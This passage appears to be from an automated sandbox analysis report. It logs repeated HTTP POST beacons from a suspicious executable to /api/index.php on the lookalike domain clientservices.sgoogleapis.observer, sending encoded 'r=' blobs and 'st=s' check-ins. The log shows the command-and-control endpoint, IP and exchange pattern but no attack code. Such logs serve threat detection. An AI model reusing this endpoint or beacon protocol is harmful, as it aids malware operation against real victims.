Jan 8, 2025 08:45:54.733674049 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:55.378366947 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoJ1QCX449FL6txT2B47Rw8Zi6zjcE8ztBIgY0f3uG9PJSD%2FKz68bxatwOgXmXMFimtmRsZ46EZCJ6j%2B%2FemrzDceetPT7JtZv070iQbOQ2ll3NfgJbKu9MRc9B5MmdDPn5IjXyhEusBzSrrzpj3R5mWT1UkbGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea921faabe0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50029	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:57.014543056 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:57.640372038 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oT0oKfvNFKOFoB9tZ65paP6izMhLwrTwVUGRo1EXFKfXPQ2CCgZNhk%2B8HTkDepSpByW1ZyyGXSPUeVHBX5LG8p%2F%2BIkd3S7VMNsRK7YF4JRkfSiWRLPpc5qS3Vqarbe3LGpviCD0GXOpkSMb%2BrmHdT0olzGJgXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea922dde5342d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1534&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50030	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:59.392281055 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:59.761519909 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okK3pqnw%2BXXtlS4ofXi%2Fr4iOltlIi82zNJQcpA4gJyGqY4V2qEjpmr6qSGmuJ4SElQSgvJbo9hxcOGl8N0UrUFBVqrJj7WcZcXL4JvrV53WTmi4Lm5qBdts%2FdTHT31U250N%2FHlc6WBJDWEc%2BpjFyqsiDsGZwxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea923b9d9b42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50031	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:01.451821089 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:02.098253965 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NgAPyT2cOcmeyUT%2FAG0JBaxtSFzYzpRnhH%2FJcP5%2Fw4%2BxSEaBcnyvWcUtbE4RlzQULHKGk%2BKifZsMPtg1ITeH6x%2F4%2FYJoX5Sta4TDrpMRovdFTDYa3QqcqFa0Yb5YiTYXwGaM7w6AJVbZLFKfubKFNSpzTq4og%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9249ade842d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1524&rtt_var=762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50032	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:03.607430935 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:04.269320965 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dcWLZAw20ZvqatZ3TwU76SNk53b5%2FLhKZFVlBZS6uEtkyxbwH546YLlR2Vj36Vwm6bV3pqYI78kFm1DP7g0O594BsOUsgi1yq4cND%2Bi5Le6dJA44nrZh3Zd1moOpgK9%2BjTWNND5Uwf%2FGfyddS0VDF8%2Fs2vwpQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92573f190f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50033	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:05.914870977 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:06.472740889 CET	824	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN%2Btncxr5LbcFvZFWOf0iyHt62%2F0wO9M%2BeAGcuM8%2BYlI%2FuK%2BG26dNkS8znxpWS%2B8kZv80UJ7Ram8DLrwkqEmsdodmSzip6ew7F8cdj3p1VfzvGrsTsdjNrZmhL%2F83X3%2Bct%2B3lRu5yejah87HM7UjgACeTEzfUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92658d2ec443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a Data Ascii: 1
Jan 8, 2025 08:46:06.606909990 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50034	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:08.130465984 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:08.672053099 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFOUP3o3geahIDK9COXh6frFYNQP2bhyTD0QZ2p%2BqzeLhdwYCAKl2wnKT0QXJbyQo0SSts%2B1Vb7%2FYGBFMn9tUIUscfdPTr9b%2BEJm8rUOA9h1lFRUj5669Ve0SZNcoPB1IHic40jFASiuQqTMYK0sGHJ%2BzaE5kw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9273481342d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50035	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:10.316471100 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:10.968169928 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsWI8XEc6%2F0DeGSWXh36Kot%2Faz1BtWUtxSjbR7G4PlM52LHCVt2IuWnIvLkb0lTJLzQRgVQiaVqE4MyhkwUUzOVGoP2uquy2F9j6GaG7mCCFlBqipuks1Ee6rTRyRsPbzbpZ85EmmiXidHTFKKrp1O66r3zOjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92811b947d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50036	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:12.484935045 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:13.131798029 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5Xbom8ImQgis3jkC8YFuaTWLiVFI7ncHK0x%2BeR5%2BOlf1qjF%2BMOcvR8Xv837RpIH9PGNEEVwrHpGGyyUNti%2Bq74KgtFvhCsJ2VoglzbRuBQciHtuIXNGYq39PfruBo9L45AUQ4i%2BZfGp8UQWdICSpgaq3K7zSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea928e9e0a7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50037	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:14.873193979 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:15.504054070 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8rRuYVrzEOuHDI%2FSnaDJOtrB1TaoUlPgfPjqtPdqIKi5lHaGEykE5xAPFVmleGrqyWbbpPRUCd3fcJyLiX87WOqHyS7aIwhvMmlLBcJt%2Fw2lrwl9T5DyT6A8Ag%2FZcfaLR5hnPOdO1SOAPCNvLgB%2B6MOXhS1GQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea929d7b708c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50038	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:17.031342030 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:17.583163023 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6L5hJ9bnPXu4KBg4UwcFJpGQZrCzEitbrl4Hr2uKCF7OQcDeoHih73UFBWHbx%2B2JRGXvIIriD65Q5Lh5fJcbdLQ6CiqjDEU77I1Yn3rwuGAJoaRUW3yfbJYF5iTXeV88BWSjDlf5wIxKxSRwNqcx0m9MgRBM6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92aaff7443ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1813&rtt_var=906&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50039	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:19.326617002 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:19.890101910 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gs8%2FfGx5z3meBarifkQ7ylvvz%2BU3o2TmuLgbecE%2F25%2FJOv4S8b50AwBGEWbUPaxE7XxlvWeB%2F1EagxpxWK1sJUKYz4CPDOrILaL%2FGQhXTM7DwhlmH1CZuXV2HYz%2FCfmnw4GEEspwtJgPmklNIqRG%2BcdMqKeuvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92b96a3543ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50040	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:21.404762030 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:21.959530115 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DHFS1r4Zxaesv7A%2FqPVvlsd7l4M0G70%2FTV2BtWau%2B25HxBd2tenX5QMsQnEtwChMrbRlGPzzpwwtY74o96hOhBPM0sdhnOjcAI%2FxUxsh1YbU0OHdgXRQP7DURqsvkR4fm0KmNLHYhiZWP7rxDaZk%2BP5Y6jSOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92c6496642d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1502&rtt_var=751&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50041	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:23.746805906 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:46:24.388957977 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48%2FJo2IskKQrQfbd8bVN5N%2FfAyb5H8W9Fi8CAlkdJ8jadqBoKUX5c6dFD4%2BD39rpbGn0i1ow59M%2FsTgwmlA%2F%2FAvkfs0VHMF%2BepND82C45QBlLV53Ihn5YQPZNGxM2Rjo5PbTGchmUbW7i2wm15ck0J%2ByEAo2vw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92d4fefc0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1461&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50042	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
